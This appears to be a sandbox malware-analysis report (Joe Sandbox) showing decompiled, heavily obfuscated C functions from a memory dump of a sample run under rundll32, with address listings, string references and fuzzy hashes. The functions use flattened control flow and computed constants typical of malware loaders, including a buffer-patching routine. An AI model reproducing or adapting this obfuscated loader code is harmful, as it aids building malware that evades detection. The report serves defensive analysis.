0x0034e520
0x0034e525
0x0034e52c
0x0034e52e
0x00000000
0x0034e52e
0x0034e512
0x0034e512
0x0034e512
0x0034e5a6
0x0034e5ab
0x0034e5b0
0x0034e5bc
0x00000000
0x0034e5b2
0x0034e5b2
0x00000000
0x0034e5b2
0x00000000
0x0034e5be
0x0034e5be
0x00000000

Strings

N, xrefs: 0034E474
o`, xrefs: 0034E3B7
`ee, xrefs: 0034E3AA
f~8, xrefs: 0034E31B
R5C, xrefs: 0034E33D
If, xrefs: 0034E3E6
^Q, xrefs: 0034E405

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: If$R5C$^Q$`ee$f~8$o`$N
API String ID: 0-3572798563
Opcode ID: 44b6cbc56cafba132329aedb3abe7e00c3aa63f1c455379955fda1b22d0bd0ce
Instruction ID: dc8c3784a49e52e6d6c72ca9e2424d09c8e8e7694891f080d5800da9de4f8d80
Opcode Fuzzy Hash: 44b6cbc56cafba132329aedb3abe7e00c3aa63f1c455379955fda1b22d0bd0ce
Instruction Fuzzy Hash: 40718472508301DFC358CF22C88985FBBE1EBC4B68F504A5DF4969A2A0D775DA49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 10014B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON

Download Yara Rule

APIs

_strcpy_s.LIBCMT ref: 10014B9E

Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4

__snprintf_s.LIBCMT ref: 10014BD7

Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
LoadLibraryA.KERNEL32(?), ref: 10014C25

Strings

LOC, xrefs: 10014B96

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 3864805678-519433814
Opcode ID: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
Instruction ID: c6b9acf05ba5f485c5c472c95a6cc1a1d49ea65b07ecc8430683ae88ba63382e
Opcode Fuzzy Hash: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
Instruction Fuzzy Hash: B011E471900118AFDB11DB64CC86BDD73B8EF09315F1241A1F7059F0A1EEB0E9859AD1

Uniqueness

Uniqueness Score: -1.00%

Function 0034CF47 Relevance: 7.9, Strings: 6, Instructions: 380
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0034CF47(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				char _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v88;
				char* _v92;
				char _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				void* _t345;
				void* _t377;
				void* _t378;
				void* _t386;
				void* _t393;
				intOrPtr _t403;
				intOrPtr* _t406;
				void* _t408;
				signed char* _t414;
				signed char* _t450;
				intOrPtr* _t455;
				intOrPtr _t456;
				intOrPtr _t457;
				void* _t458;
				signed char* _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				void* _t470;
				void* _t471;
				void* _t474;

				_t406 = _a8;
				_t456 = _a4;
				_push(_a20);
				_t455 = _a16;
				_push(_t455);
				_push(_a12);
				_push(_t406);
				_push(_t456);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t345);
				_v256 = 0xcf1dac;
				_t471 = _t470 + 0x1c;
				_v256 = _v256 ^ 0x662b1d0f;
				_v256 = _v256 << 2;
				_t408 = 0x8e80a37;
				_v256 = _v256 + 0xffff9089;
				_v256 = _v256 ^ 0x9b8f9315;
				_v160 = 0x25617a;
				_v160 = _v160 << 2;
				_v160 = _v160 ^ 0x009585a8;
				_v264 = 0x39e017;
				_v264 = _v264 + 0xffffbc9c;
				_v264 = _v264 ^ 0xb11c7ead;
				_v264 = _v264 + 0xffffd7b2;
				_v264 = _v264 ^ 0xb125b990;
				_v240 = 0xb82586;
				_t460 = 0x74;
				_v240 = _v240 / _t460;
				_v240 = _v240 << 1;
				_t461 = 0x3b;
				_v132 = _v132 & 0x00000000;
				_v240 = _v240 * 0x36;
				_v240 = _v240 ^ 0x00aace1a;
				_v180 = 0xcab8fe;
				_v180 = _v180 ^ 0xca9451c5;
				_v180 = _v180 | 0x3e03c42f;
				_v180 = _v180 ^ 0xfe5c53ad;
				_v248 = 0x57862;
				_v248 = _v248 | 0x3f7dcfba;
				_v248 = _v248 / _t461;
				_t462 = 0x62;
				_v248 = _v248 / _t462;
				_v248 = _v248 ^ 0x00057d9a;
				_v252 = 0x68f561;
				_v252 = _v252 << 6;
				_v252 = _v252 >> 0xd;
				_v252 = _v252 | 0x3cddc102;
				_v252 = _v252 ^ 0x3cda88f2;
				_v192 = 0x7c8e99;
				_v192 = _v192 + 0x829c;
				_v192 = _v192 * 0x31;
				_v192 = _v192 ^ 0x17fda794;
				_v228 = 0x74d91a;
				_v228 = _v228 << 3;
				_v228 = _v228 + 0x7502;
				_v228 = _v228 * 0x63;
				_v228 = _v228 ^ 0x69a7ce60;
				_v208 = 0xc909ae;
				_v208 = _v208 << 1;
				_t463 = 0xb;
				_v208 = _v208 / _t463;
				_v208 = _v208 ^ 0x00276772;
				_v164 = 0x673800;
				_v164 = _v164 << 9;
				_v164 = _v164 ^ 0xce7e8a93;
				_v232 = 0xb859bd;
				_v232 = _v232 + 0xde76;
				_t464 = 0x5b;
				_v232 = _v232 * 0x1c;
				_v232 = _v232 * 0x30;
				_v232 = _v232 ^ 0xcc63b0a7;
				_v172 = 0x7eda56;
				_v172 = _v172 << 3;
				_v172 = _v172 ^ 0x03f50911;
				_v184 = 0x2f7891;
				_v184 = _v184 / _t464;
				_t465 = 0x41;
				_v184 = _v184 * 0x49;
				_v184 = _v184 ^ 0x0024fbf7;
				_v148 = 0x4a0bea;
				_v148 = _v148 ^ 0x502016f1;
				_v148 = _v148 ^ 0x506ad42a;
				_v260 = 0x9ebd58;
				_v260 = _v260 >> 8;
				_v260 = _v260 << 0xf;
				_v260 = _v260 + 0xb306;
				_v260 = _v260 ^ 0x4f54a3e8;
				_v204 = 0xce3506;
				_v204 = _v204 << 0xf;
				_v204 = _v204 << 0xc;
				_v204 = _v204 ^ 0x300ddb73;
				_v244 = 0xe7c592;
				_v244 = _v244 >> 5;
				_v244 = _v244 ^ 0x506a7775;
				_v244 = _v244 << 1;
				_v244 = _v244 ^ 0xa0d2afa7;
				_v268 = 0x1d8a79;
				_v268 = _v268 << 2;
				_v268 = _v268 / _t465;
				_v268 = _v268 | 0x253986a4;
				_v268 = _v268 ^ 0x2531568a;
				_v216 = 0x116531;
				_t466 = 0x61;
				_v216 = _v216 * 0x66;
				_v216 = _v216 ^ 0xfffdc9ed;
				_v216 = _v216 ^ 0xf917010b;
				_v200 = 0xc05f9c;
				_v200 = _v200 / _t466;
				_v200 = _v200 * 0x6f;
				_v200 = _v200 ^ 0x00dca3d1;
				_v212 = 0xdb89ea;
				_v212 = _v212 >> 0xa;
				_v212 = _v212 >> 9;
				_v212 = _v212 ^ 0x0000ad8d;
				_v152 = 0x38fb70;
				_v152 = _v152 ^ 0x310cc67b;
				_v152 = _v152 ^ 0x313af23a;
				_v136 = 0x7e2008;
				_v136 = _v136 ^ 0x7ad3030b;
				_v136 = _v136 ^ 0x7aaaa86e;
				_v196 = 0x9c4278;
				_t467 = 0x4e;
				_v196 = _v196 * 0x7e;
				_v196 = _v196 ^ 0xa26962db;
				_v196 = _v196 ^ 0xee89d9da;
				_v220 = 0x1e88f4;
				_v220 = _v220 >> 4;
				_v220 = _v220 >> 7;
				_v220 = _v220 ^ 0x000c14cc;
				_v140 = 0xc2e6ba;
				_v140 = _v140 + 0x8875;
				_v140 = _v140 ^ 0x00c43ba1;
				_v188 = 0xdb74c;
				_v188 = _v188 << 4;
				_v188 = _v188 * 0x5c;
				_v188 = _v188 ^ 0x4edda20a;
				_v236 = 0x62ea5;
				_v236 = _v236 / _t467;
				_v236 = _v236 >> 0xb;
				_v236 = _v236 ^ 0x7372adb3;
				_v236 = _v236 ^ 0x73757ff2;
				_v144 = 0x2b6271;
				_v144 = _v144 ^ 0x1ac7dce1;
				_v144 = _v144 ^ 0x1ae73668;
				_v224 = 0x8bb898;
				_v224 = _v224 + 0x43a9;
				_v224 = _v224 << 0x10;
				_t468 = 0x71;
				_t469 = _v132;
				_v224 = _v224 / _t468;
				_v224 = _v224 ^ 0x023712cd;
				_v156 = 0xb23c07;
				_v156 = _v156 + 0x4ded;
				_v156 = _v156 ^ 0x00b7ca1c;
				_v168 = 0xb501ce;
				_v168 = _v168 ^ 0x6706c67f;
				_v168 = _v168 ^ 0x67b3c7a1;
				_v176 = 0xab8984;
				_v176 = _v176 * 0x22;
				_v176 = _v176 ^ 0x16c84308;
				goto L1;
				do {
					while(1) {
						L1:
						_t474 = _t408 - 0xd9acfaa;
						if(_t474 > 0) {
							break;
						}
						if(_t474 == 0) {
							E00358519(_v236, _v144, _v128);
							_t408 = 0xfbb751f;
							continue;
						}
						if(_t408 == 0x15a913b) {
							_v40 = _t456;
							_v92 =  &_v32;
							_v56 =  *_t455;
							_v52 =  *((intOrPtr*)(_t455 + 4));
							_v88 = 0x20;
							_t393 = E00347735(_v192,  &_v112,  &_v120, _v228, _v208);
							_t471 = _t471 + 0x10;
							if(_t393 == 0) {
								L20:
								return _v132;
							}
							_t408 = 0xf0a856e;
							continue;
						}
						if(_t408 == 0x3749e66) {
							_t469 = E00350AE0(_v176, _v168);
							_t408 = 0x46acfc9;
							 *((intOrPtr*)(_t406 + 4)) = _v160 + _v124 + _t469;
							continue;
						}
						if(_t408 == 0x46acfc9) {
							_push(_t408);
							_push(_t408);
							_t403 = E00347FF2( *((intOrPtr*)(_t406 + 4)));
							 *_t406 = _t403;
							if(_t403 == 0) {
								_t408 = 0xd9acfaa;
							} else {
								_v132 = 1;
								_t408 = 0xfb3baa2;
							}
							continue;
						}
						if(_t408 != 0x8e80a37) {
							goto L31;
						}
						_t408 = 0xfac38db;
					}
					if(_t408 == 0xf0a856e) {
						_t377 = E003470B3(_v164,  &_v128,  &_v120, _v232, _v172);
						_t471 = _t471 + 0xc;
						if(_t377 == 0) {
							_t408 = 0xfbb751f;
							goto L31;
						}
						_t408 = 0x3749e66;
						goto L1;
					}
					if(_t408 == 0xfac38db) {
						_push( *_t455);
						_t378 = E0035AE6D(_v240,  &_v32,  *((intOrPtr*)(_t455 + 4)), _v180, _t408, _v248);
						_t471 = _t471 + 0x14;
						if(_t378 == 0) {
							goto L20;
						}
						_t408 = 0x15a913b;
						goto L1;
					}
					if(_t408 == 0xfb3baa2) {
						_t457 =  *_t406;
						E00347E87(_v268, _v216, _v200, _t457);
						_t458 = _t457 + _v264;
						E0034ED7E(_v212, _t458, _v152, _v128, _v124);
						_t459 = _t458 + _v124;
						E0034A492(_v196, _v220, _t459, _t469);
						_t450 =  &(_t459[_t469]);
						_t471 = _t471 + 0x20;
						_t414 = _t459;
						if(_t459 >= _t450) {
							L25:
							_t386 = E00350AE0(0xe, 0);
							_t408 = 0xd9acfaa;
							 *((char*)(_t386 + _t459)) = 0;
							_t456 = _a4;
							goto L1;
						} else {
							goto L22;
						}
						do {
							L22:
							if(( *_t414 & 0x000000ff) == _v256) {
								 *_t414 = 0xc3;
							}
							_t414 =  &(_t414[1]);
						} while (_t414 < _t450);
						goto L25;
					}
					if(_t408 != 0xfbb751f) {
						goto L31;
					}
					E00358519(_v224, _v156, _v120);
					goto L20;
					L31:
				} while (_t408 != 0x5927677);
				goto L20;
			}

0x0034cf4e
0x0034cf57
0x0034cf5f
0x0034cf66
0x0034cf6d
0x0034cf6e
0x0034cf75
0x0034cf76
0x0034cf77
0x0034cf78
0x0034cf79
0x0034cf7e
0x0034cf86
0x0034cf89
0x0034cf93
0x0034cf98
0x0034cf9d
0x0034cfa5
0x0034cfad
0x0034cfb8
0x0034cfc0
0x0034cfcb
0x0034cfd3
0x0034cfdb
0x0034cfe3
0x0034cfeb
0x0034cff3
0x0034d001
0x0034d006
0x0034d00c
0x0034d015
0x0034d018
0x0034d020
0x0034d024
0x0034d02c
0x0034d034
0x0034d03c
0x0034d044
0x0034d04c
0x0034d054
0x0034d064
0x0034d06c
0x0034d06f
0x0034d073
0x0034d07b
0x0034d083
0x0034d088
0x0034d08d
0x0034d095
0x0034d09d
0x0034d0a5
0x0034d0b2
0x0034d0b6
0x0034d0be
0x0034d0c6
0x0034d0cb
0x0034d0d8
0x0034d0dc
0x0034d0e4
0x0034d0ec
0x0034d0f8
0x0034d0fd
0x0034d103
0x0034d10b
0x0034d116
0x0034d11e
0x0034d129
0x0034d131
0x0034d13e
0x0034d141
0x0034d14a
0x0034d14e
0x0034d156
0x0034d15e
0x0034d163
0x0034d16b
0x0034d17b
0x0034d184
0x0034d187
0x0034d18b
0x0034d193
0x0034d19e
0x0034d1a9
0x0034d1b4
0x0034d1bc
0x0034d1c1
0x0034d1c6
0x0034d1ce
0x0034d1d6
0x0034d1de
0x0034d1e3
0x0034d1e8
0x0034d1f0
0x0034d1f8
0x0034d1fd
0x0034d205
0x0034d209
0x0034d211
0x0034d219
0x0034d226
0x0034d22a
0x0034d232
0x0034d23a
0x0034d247
0x0034d248
0x0034d24c
0x0034d254
0x0034d25c
0x0034d26a
0x0034d273
0x0034d277
0x0034d27f
0x0034d287
0x0034d28c
0x0034d291
0x0034d299
0x0034d2a4
0x0034d2af
0x0034d2ba
0x0034d2c5
0x0034d2d0
0x0034d2db
0x0034d2ec
0x0034d2ef
0x0034d2f3
0x0034d2fb
0x0034d303
0x0034d30b
0x0034d310
0x0034d315
0x0034d31d
0x0034d328
0x0034d333
0x0034d33e
0x0034d346
0x0034d350
0x0034d354
0x0034d35c
0x0034d36c
0x0034d370
0x0034d375
0x0034d37d
0x0034d385
0x0034d390
0x0034d39b
0x0034d3a6
0x0034d3ae
0x0034d3b6
0x0034d3bf
0x0034d3c2
0x0034d3c9
0x0034d3cd
0x0034d3d5
0x0034d3e0
0x0034d3eb
0x0034d3f6
0x0034d3fe
0x0034d406
0x0034d40e
0x0034d41b
0x0034d41f
0x0034d41f
0x0034d427
0x0034d427
0x0034d427
0x0034d427
0x0034d42d
0x00000000
0x00000000
0x0034d433
0x0034d553
0x0034d559
0x00000000
0x0034d559
0x0034d43f
0x0034d4e3
0x0034d4f6
0x0034d4ff
0x0034d509
0x0034d51f
0x0034d52b
0x0034d530
0x0034d535
0x0034d5a7
0x0034d5b8
0x0034d5b8
0x0034d537
0x00000000
0x0034d537
0x0034d44b
0x0034d4b7
0x0034d4cb
0x0034d4d0
0x00000000
0x0034d4d0
0x0034d453
0x0034d477
0x0034d478
0x0034d479
0x0034d47e
0x0034d484
0x0034d498
0x0034d486
0x0034d486
0x0034d491
0x0034d491
0x00000000
0x0034d484
0x0034d45b
0x00000000
0x00000000
0x0034d461
0x0034d461
0x0034d569
0x0034d6ac
0x0034d6b1
0x0034d6b6
0x0034d6c2
0x00000000
0x0034d6c2
0x0034d6b8
0x00000000
0x0034d6b8
0x0034d575
0x0034d65b
0x0034d674
0x0034d679
0x0034d67e
0x00000000
0x00000000
0x0034d684
0x00000000
0x0034d684
0x0034d581
0x0034d5b9
0x0034d5c8
0x0034d5d1
0x0034d5ee
0x0034d5f3
0x0034d60e
0x0034d613
0x0034d616
0x0034d619
0x0034d61d
0x0034d630
0x0034d63f
0x0034d646
0x0034d64b
0x0034d64f
0x00000000
0x00000000
0x00000000
0x00000000
0x0034d61f
0x0034d61f
0x0034d626
0x0034d628
0x0034d628
0x0034d62b
0x0034d62c
0x00000000
0x0034d61f
0x0034d589
0x00000000
0x00000000
0x0034d5a1
0x00000000
0x0034d6c7
0x0034d6c7
0x00000000

Strings

za%, xrefs: 0034CFAD
qb+, xrefs: 0034D385
, xrefs: 0034D51F
uwjP, xrefs: 0034D1FD
rg', xrefs: 0034D103
M, xrefs: 0034D3E0

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $qb+$rg'$uwjP$za%$M
API String ID: 0-3591755710
Opcode ID: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
Instruction ID: 1e985fd1c0a260da67c9779b56262913db6bd85102d7a62a33d0af3bfa1ac52d
Opcode Fuzzy Hash: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
Instruction Fuzzy Hash: 991222715083808FD369CF25C486A5BFBF1FBC5348F50891DF69A8A261DBB5A948CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0035907F Relevance: 7.8, Strings: 6, Instructions: 261
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0035907F(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				void* _t284;
				void* _t285;
				intOrPtr _t286;
				void* _t293;
				void* _t301;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				void* _t311;
				intOrPtr* _t343;
				void* _t347;
				signed int* _t348;

				_t348 =  &_v132;
				_t343 = __ecx;
				_v4 = __ecx;
				_v40 = 0x7c806d;
				_v40 = _v40 + 0x9e80;
				_v40 = _v40 ^ 0x007d1eed;
				_v12 = 0xea5ac0;
				_v12 = _v12 + 0xffff451e;
				_v12 = _v12 ^ 0x00e99fde;
				_v24 = 0xace3a9;
				_t347 = 0;
				_t304 = 0xa;
				_v24 = _v24 / _t304;
				_v24 = _v24 ^ 0x001149f7;
				_t301 = 0x97dfe60;
				_v112 = 0x63471f;
				_v112 = _v112 ^ 0x706c6b64;
				_v112 = _v112 | 0x0d4cecae;
				_v112 = _v112 << 3;
				_v112 = _v112 ^ 0xea7f67f8;
				_v28 = 0x68a2fc;
				_t305 = 0x5b;
				_v28 = _v28 * 0x1c;
				_v28 = _v28 ^ 0x0b71d390;
				_v84 = 0x508d02;
				_v84 = _v84 | 0x7bfb7ba7;
				_v84 = _v84 ^ 0x7bffa5e3;
				_v124 = 0xc0d8a4;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 ^ 0xdba96bec;
				_v124 = _v124 + 0xffffcd63;
				_v124 = _v124 ^ 0xdb66cc39;
				_v116 = 0xc7a01f;
				_v116 = _v116 * 0x50;
				_v116 = _v116 << 7;
				_v116 = _v116 + 0x525d;
				_v116 = _v116 ^ 0x3100192e;
				_v88 = 0x173e76;
				_v88 = _v88 / _t305;
				_v88 = _v88 + 0xcdb8;
				_v88 = _v88 ^ 0x00098d3b;
				_v48 = 0x3a45de;
				_t306 = 0x3d;
				_v48 = _v48 / _t306;
				_v48 = _v48 ^ 0x0006d702;
				_v52 = 0xd8d0f7;
				_v52 = _v52 | 0xabcf1793;
				_v52 = _v52 + 0xffff6a1e;
				_v52 = _v52 ^ 0xabd8e28c;
				_v64 = 0xff5420;
				_v64 = _v64 >> 9;
				_v64 = _v64 + 0xffff2626;
				_v64 = _v64 ^ 0xfff0768b;
				_v80 = 0x65116e;
				_v80 = _v80 >> 9;
				_v80 = _v80 | 0xde6750c8;
				_v80 = _v80 ^ 0xde6208e1;
				_v56 = 0x2d6903;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 + 0xffff4c70;
				_v56 = _v56 ^ 0xfff58c10;
				_v132 = 0xe5be5a;
				_v132 = _v132 + 0xfffffbec;
				_v132 = _v132 << 3;
				_v132 = _v132 ^ 0x46ad3c03;
				_v132 = _v132 ^ 0x418237eb;
				_v108 = 0x3fa801;
				_v108 = _v108 + 0x902;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x9ac0b97a;
				_v108 = _v108 ^ 0x9ac73a04;
				_v72 = 0x454e35;
				_v72 = _v72 + 0x4c9c;
				_t307 = 0x29;
				_v72 = _v72 / _t307;
				_v72 = _v72 ^ 0x000328df;
				_v32 = 0x46b9f;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0003d4b9;
				_v16 = 0xab007f;
				_v16 = _v16 ^ 0x56a4e801;
				_v16 = _v16 ^ 0x56002f48;
				_v100 = 0xb9d48c;
				_v100 = _v100 | 0xb434f54e;
				_v100 = _v100 >> 0x10;
				_v100 = _v100 ^ 0x000dcd0e;
				_v92 = 0x17070b;
				_t308 = 0x37;
				_v92 = _v92 / _t308;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0x0038b56c;
				_v60 = 0xdb418a;
				_v60 = _v60 * 0x4d;
				_v60 = _v60 << 2;
				_v60 = _v60 ^ 0x07c52fa3;
				_v68 = 0x99d1b0;
				_v68 = _v68 << 1;
				_v68 = _v68 + 0xadc1;
				_v68 = _v68 ^ 0x01384a96;
				_v120 = 0xfb4a64;
				_v120 = _v120 | 0x92bfeeef;
				_v120 = _v120 + 0x1827;
				_v120 = _v120 >> 5;
				_v120 = _v120 ^ 0x0494323d;
				_v128 = 0xf75f57;
				_v128 = _v128 >> 4;
				_v128 = _v128 + 0xe158;
				_v128 = _v128 + 0xffff16ce;
				_v128 = _v128 ^ 0x000f9950;
				_v76 = 0xb94cf;
				_v76 = _v76 | 0xc911a6ab;
				_v76 = _v76 >> 2;
				_v76 = _v76 ^ 0x3240c46f;
				_v104 = 0x7ca07;
				_v104 = _v104 * 0x23;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0xe4d42587;
				_v104 = _v104 ^ 0xe4c14657;
				_v44 = 0x308a5a;
				_v44 = _v44 >> 0x10;
				_v44 = _v44 ^ 0x0006e55e;
				_v96 = 0x427aa5;
				_v96 = _v96 + 0xed3d;
				_v96 = _v96 + 0xffff13f4;
				_v96 = _v96 ^ 0x0046a078;
				_v20 = 0xf8f4;
				_v20 = _v20 * 0x4a;
				_t284 = 0x4469cd4;
				_v20 = _v20 ^ 0x004ab19f;
				_v36 = 0x7998ac;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x0008cf6c;
				do {
					while(_t301 != _t284) {
						if(_t301 == 0x661bd7c) {
							E0034957D(_v8, _v96, _v20, _v28, _v36);
						} else {
							if(_t301 == 0x8cd68b1) {
								_push(_v116);
								_push(_v124);
								_t293 = E0035DCF7(_v84, 0x341954, __eflags);
								_push(_v52);
								_push(_v48);
								__eflags = E00349462(_t293, _v80,  &_v8, E0035DCF7(_v88, 0x341814, __eflags), _v56, _v40) - _v12;
								_t301 =  ==  ? 0x4469cd4 : 0x94c729c;
								E0034A8B0(_v132, _t293, _v108);
								E0034A8B0(_v72, _t294, _v32);
								_t343 = _v4;
								L8:
								_t284 = 0x4469cd4;
								_t348 =  &(_t348[0xb]);
								goto L9;
							} else {
								if(_t301 != 0x97dfe60) {
									goto L9;
								} else {
									_t301 = 0x8cd68b1;
									continue;
								}
							}
						}
						L12:
						return _t347;
					}
					_push(_v92);
					_push(_v100);
					_t285 = E0035DCF7(_v16, 0x341854, __eflags);
					_pop(_t311);
					_t286 =  *0x363dfc; // 0x0
					__eflags = E0034AA4D(_v60, _t285,  *((intOrPtr*)(_t343 + 4)), _v120, _v24, _v8, _t286 + 0x40, _v128, _t311,  *_t343, _v76) - _v112;
					_t301 = 0x661bd7c;
					_t347 =  ==  ? 1 : _t347;
					E0034A8B0(_v104, _t285, _v44);
					goto L8;
					L9:
					__eflags = _t301 - 0x94c729c;
				} while (__eflags != 0);
				goto L12;
			}

0x0035907f
0x00359089
0x0035908b
0x00359092
0x0035909c
0x003590a4
0x003590ac
0x003590b7
0x003590c2
0x003590cd
0x003590db
0x003590dd
0x003590e2
0x003590eb
0x003590f6
0x003590fb
0x00359103
0x0035910b
0x00359113
0x00359118
0x00359120
0x0035912d
0x00359130
0x00359134
0x0035913c
0x00359144
0x0035914c
0x00359154
0x0035915c
0x00359164
0x0035916c
0x00359174
0x0035917c
0x00359189
0x0035918d
0x00359192
0x0035919a
0x003591a2
0x003591b2
0x003591b6
0x003591be
0x003591c6
0x003591d2
0x003591d5
0x003591d9
0x003591e1
0x003591e9
0x003591f1
0x003591f9
0x00359201
0x00359209
0x0035920e
0x00359216
0x0035921e
0x00359226
0x0035922b
0x00359233
0x0035923b
0x00359243
0x00359248
0x00359250
0x00359258
0x00359260
0x00359268
0x0035926d
0x00359277
0x0035927f
0x00359287
0x0035928f
0x00359294
0x0035929c
0x003592a4
0x003592ac
0x003592ba
0x003592bf
0x003592c5
0x003592cd
0x003592d5
0x003592da
0x003592e2
0x003592ed
0x003592f8
0x00359303
0x0035930b
0x00359313
0x00359318
0x00359320
0x0035932c
0x0035932f
0x00359333
0x00359338
0x00359340
0x0035934d
0x00359351
0x00359356
0x0035935e
0x00359366
0x0035936a
0x00359372
0x0035937a
0x00359382
0x0035938a
0x00359392
0x00359397
0x0035939f
0x003593a7
0x003593ac
0x003593b4
0x003593bc
0x003593c4
0x003593cc
0x003593d4
0x003593d9
0x003593e1
0x003593ee
0x003593f2
0x003593f7
0x003593ff
0x00359407
0x0035940f
0x00359414
0x0035941c
0x00359424
0x0035942c
0x00359434
0x0035943c
0x0035944f
0x00359456
0x0035945b
0x00359466
0x0035946e
0x00359473
0x0035947b
0x0035947b
0x00359489
0x003595e5
0x0035948f
0x00359495
0x003594aa
0x003594b3
0x003594bb
0x003594c0
0x003594cb
0x0035950e
0x00359519
0x0035951c
0x0035952e
0x00359533
0x003595b5
0x003595b5
0x003595ba
0x00000000
0x00359497
0x0035949d
0x00000000
0x003594a3
0x003594a3
0x00000000
0x003594a3
0x0035949d
0x00359495
0x003595ef
0x003595f9
0x003595f9
0x0035953c
0x00359545
0x00359550
0x00359556
0x00359564
0x003595a0
0x003595a2
0x003595ab
0x003595b0
0x00000000
0x003595bd
0x003595bd
0x003595bd
0x00000000

Strings

dklp, xrefs: 00359103
=, xrefs: 00359424
]R, xrefs: 00359192
X, xrefs: 003593AC
H/, xrefs: 003592F8
5NE, xrefs: 003592A4

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5NE$=$H/$X$]R$dklp
API String ID: 0-668800459
Opcode ID: 7ae823c1387a8daf83be86e53a9556f018902668cba364702385aad3ace98035
Instruction ID: 0b8a4cf1564cea827092ad671b0bcb52a37e42815bde128d4fbe5907d604b30d
Opcode Fuzzy Hash: 7ae823c1387a8daf83be86e53a9556f018902668cba364702385aad3ace98035
Instruction Fuzzy Hash: A3D11FB11087808FD3A9CF25C48A60BBBF1FBC5758F50891DF5AA86260DBB58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00360F33 Relevance: 7.8, Strings: 6, Instructions: 260
